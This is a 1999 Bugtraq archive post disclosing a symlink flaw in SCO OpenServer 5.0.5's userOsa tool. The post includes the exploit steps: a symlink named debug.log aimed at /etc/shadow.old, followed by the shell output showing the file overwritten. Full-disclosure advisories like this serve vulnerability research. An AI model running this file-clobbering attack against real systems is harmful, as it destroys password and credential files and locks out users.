Bugtraq mailing list archives
SCO OpenServer 5.0.5 overwrite /etc/shadow
From: btellier () WEBLEY COM (Brock Tellier)
Date: Mon, 11 Oct 1999 15:24:59 -0500
Greetings, Any user may overwrite any file with group auth (i.e. /etc/shadow, /etc/passwd) using /etc/sysadm.d/bin/userOsa. Note that this will not change the permissions of the file or allow for the user to input a passwd entry string into these files, it will simply clobber the contents of the file with debug output. When userOsa recieves invalid input, it generates a log file called "debug.log" in the PWD. This file is created with group auth permissions,does not check for this file's existence, and will follow symlinks. Thus the exploit is as follows: scohack:/tmp$ ln -s /etc/shadow.old debug.log scohack:/tmp$ /etc/sysadm.d/bin/userOsa bah connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}} Failed to listen to client Failure in making connection to OSA. scohack:/tmp$ ----- BEFORE EXPLOIT: scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old AFTER EXPLOIT (note the file size): scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old scohack:/# cat /etc/shadow.old
Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604>
<<< SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}) scohack:/# Brock Tellier UNIX Systems Administrator
Current thread:
- BUG: Win NT TCP/IP Security filters does not get enforced Stefan Norberg (Oct 08)
- Re: BUG: Win NT TCP/IP Security filters does not get enforced Stefan Norberg (Oct 10)
- Re: BUG: Win NT TCP/IP Security filters does not get enforced David LeBlanc (Oct 12)
- SCO OpenServer 5.0.5 overwrite /etc/shadow Brock Tellier (Oct 11)
- IE 5.0 security vulnerability - reading local (and from any domain, probably window spoofing is possible) files using IFRAME and document.execCommand Georgi Guninski (Oct 11)
- Re: SCO OpenServer 5.0.5 overwrite /etc/shadow Bela Lubkin (Oct 11)
- Re: SCO OpenServer 5.0.5 overwrite /etc/shadow Ralph the Wonder Llama (Oct 12)
- Re: SCO OpenServer 5.0.5 overwrite /etc/shadow Bela Lubkin (Oct 12)
- Xerox DocuColor 4 LP D.O.S Jason Lutz (Oct 13)
- Security of "Virtual Network Computer" Mikael Olsson (Oct 12)
- Re: Security of "Virtual Network Computer" Cameron Simpson (Oct 12)
- Re: Security of "Virtual Network Computer" Dan Foster (Oct 12)
- Re: Security of "Virtual Network Computer" Luca Berra (Oct 13)
- Finjan Alert: WinNT.Infis Trojan by way of Tim Wieneke (Oct 13)
- Re: BUG: Win NT TCP/IP Security filters does not get enforced Stefan Norberg (Oct 10)